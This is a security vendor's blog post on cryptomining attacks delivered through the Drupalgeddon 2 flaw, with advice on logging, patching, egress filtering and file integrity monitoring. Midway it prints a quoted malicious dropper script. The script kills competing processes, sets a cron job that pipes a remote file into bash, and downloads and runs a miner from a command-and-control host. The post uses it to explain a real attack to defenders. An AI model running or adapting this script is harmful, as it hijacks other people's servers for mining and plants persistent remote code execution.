Cryptomining – How Prevalent Is It And How To Stop It

One of the recent additions to the cyber threat landscape plaguing many organizations is the introduction of Crypto Miners. Due to the rise in popularity of Cryptocurrency, attackers have been shifting their attention and focus on gaining access to as many resources as they can find. The end goal of these attacks is to utilize the victim’s CPU to mine Cryptocurrency. To gain access to these resources the attackers are cycling in and out the latest and most popular exploitable internet facing applications.

The payloads these Crypto Miners are dropping have all been very similar only reencrypting to bypass EDR and AV solutions. While many will argue that Cryptocurrency Mining (“cryptomining”) is a victimless crime as it’s trivial to use automated bots to siphon processing power without user interaction and nowhere near the headache of a ransomware incident, the truth is these attacks highlight a threat of their own. In a worst-case scenario, unthrottled processing can cause serious latency on hosts and potentially cause major issues, such as rendering a service unavailable.

You probably have it in your environment

It is highly likely that you’ve already experienced this threat the hard way by finding an unresponsive server or experiencing some type of latency or sluggish behavior on your network or devices. Even if you haven’t noticed the threat yet, if you have an externally facing web server the chances you’re being affected by it remain elevated. That said, you may not have a reliable way to identify if other servers on your network are affected and/or how to stop this threat from starting in the first place. In this blog post we will go through ways to both identify this threat and protect your network.

Real World Example

As with all defensive measures, it is important to understand the scope of the threat and have the proper visibility of the environment. As an example, let’s focus on the aspect of vulnerable servers which have been compromised to allow for cryptomining in the recent Drupalgeddon 2 vulnerability exploit. This attack, which at this writing has impacted over 400 government and university websites worldwide, leverages the critical remote-code execution (RCE) vulnerability (CVE-2018-7600), as reported by Troy Mursch, a researcher with Bad Packets Report.

This particular threat can be broken down into two actions:
1. An attacker gaining access to a host
2. Introducing a method to start a CryptoMining process.

Let’s dive into how we can detect and prevent these activities.

How Cryptominers gain access

As was the case with the Drupalgeddon 2 attacks, criminals are conducting large scale scans across the internet for vulnerabilities in order to gain some level of privileged access on a server. With tools such as urlscan.io both attackers and defenders can determine which external facing web services are running out of date and vulnerable software. Once the vulnerable services are identified a custom exploit is built and delivered to the servers via a Web Request allowing for Remote Code Execution (RCE) on the host, which is the goal of this action.

Detection

  • Ensure proper logging – Verify that all successful ingress and egress traffic logs from the network are enabled. Any Internet facing Web Server should be configured to log all accesses from the true source IP.  Once properly logged these should be centralized for analysis and monitored for anomalous behavior.
  • Behavior Analysis – Once proper logging has been established and centralized, the logs should be baselined for unusual activity. Hunting through the logs for Indicators of Compromise and Anomalous activity would provide additional insight into the intrusion. Simply setting alerts for an excessive number of failed logins can help identify bad actor intrusion attempts.
  • Network Signatures – Utilize an Intrusion Detection/Prevention System (IDS/IPS) with custom rulesets targeting the activity.

Prevention

  • Active Patching – With the exception of zero-day vulnerabilities, most of the vulnerabilities being exploited have been patched by the vendor requiring an agile vulnerability management program to ensure you maintain a secure posture.
  • Proactive Blocking w/ OpenSource Intelligence – Ensuring that the attacking IPs being reported by other organizations may not completely erase the risk associated with the threat however it can greatly diminish it. Great examples of this are the Volexity blog on Drupalgeddon  and the Cybercrime IP Feeds

Once they’ve exploited you…….. (the CryptoMining process)

Once the attacker has access to the server the next step is to achieve their goal, which in this case is to start a Mining Process. This can be accomplished in many ways however the most common way is to utilize the “wget” or “curl” command to pull a script back from a Command & Control (C2) server during the initial exploit. One example of these scripts can be seen below.

#!/bin/sh
 ps aux | grep -vw suppoie | awk ‘{if($3>40.0) print $2}’ | while read procid
 do
 kill -9 $procid
 done
 rm -rf /dev/shm/jboss
 ps -fe|grep -w suppoie |grep -v grep
 if [ $? -eq 0 ]
 then
 pwd
 else
 crontab -r || true andand \
 echo “* * * * * curl -s http://xzy.xyz.xyz.xyz/logo7.jpg | bash -s” >> /tmp/cron || true andand \
 crontab /tmp/cron || true andand \
 rm -rf /tmp/cron || true andand \
 curl -o /var/tmp/config.json http:// xzy.xyz.xyz.xyz:8220/1.json
 curl -o /var/tmp/suppoie http:// xzy.xyz.xyz.xyz:8220/rig
 chmod 777 /var/tmp/suppoie
 cd /var/tmp
 proc=`grep -c ^processor /proc/cpuinfo`
 cores=$((($proc+1)/2))
 num=$(($cores*3))
 /sbin/sysctl -w vm.nr_hugepages=`$num`
 nohup ./suppoie -c config.json -t `echo $cores` >/dev/null and
 fi
 sleep 3
 echo “runing…..”

The purpose of this script is to remove any existing versions of itself then set a form of persistence in the crontab to download itself ensuring it’s running constantly. Next it downloads the necessary configuration files and ELF executables while checking for information about the host’s CPU. Finally, it runs the executable with the configuration file as a parameter. Now the host has been successfully compromised with a cryptominer and it only took a mater of seconds. It should be noted that the process took into account how many CPU’s the compromised host has, and it will throttle itself so it has a reduced impact on visitors’ CPUs and will be harder to detect. Let’s see how this could be prevented or detected once it occurs.

Detection

  • File Integrity Monitoring – Servers should be configured to ensure that important files, such as crontab, are not modified either maliciously or unintentionally. Alerts should be configured to identify any such actions.
  • OpenSource Signatures – Utilize a Network Intrusion Detection/Prevention System with custom rulesets targeting the activity.

Prevention

  • Proper Permissions – One way to prevent this attack from being successful is by ensuring the account used to run the externally facing service is a limited account with permissions only to run the commands necessary to operate.
  • Egress Traffic Enforcement Policy – Any internet facing server should have a list of hosts/networks to which it needs to initiate communications and should be restricted to those hosts. This would ensure that even if the host was compromised via the Remote Code Execution (RCE) vulnerability that the follow on C2 communication would be difficult to obtain.
  • Proactive Blocking w/ OpenSource Intelligence – Ensuring the Command & Control IPs which are being reported by other organizations may not completely erase the risk associated with the threat however it can greatly diminish it.

In the case where you’ve detected the threat in your environment you’ll need to be able to safely remove the CryptoMiner from your environment. While the various compromises may have different artifacts in order to completely eradicate the miner from your system you must review all the forms of persistence on the host and ensure they are removed. This will involve conducting root cause analysis and determining what effects the attack had on the system. System owners can also identify when the attack occurred and utilize back ups to restore the host to known-good state. However, before placing the system back into production the root cause should be patched to ensure the same exploit does not compromise the system again.

As CryptoMiners begin to become the new trend in mass attacks against vulnerable servers, your network doesn’t have to become the next ill-informed victim. By utilizing the proactive concepts in this post you’ll be able to know when an attack happens and prevent it from successfully compromising your servers. If you believe you’ve already become a victim to this crime but aren’t sure where to start, TBG Security offers a range of services to help secure your environment.

Previous ArticleSome useful advice for newly-appointed CIOs and CISOs Next ArticleU.S. and China trade wars: What’s the likely impact on information security?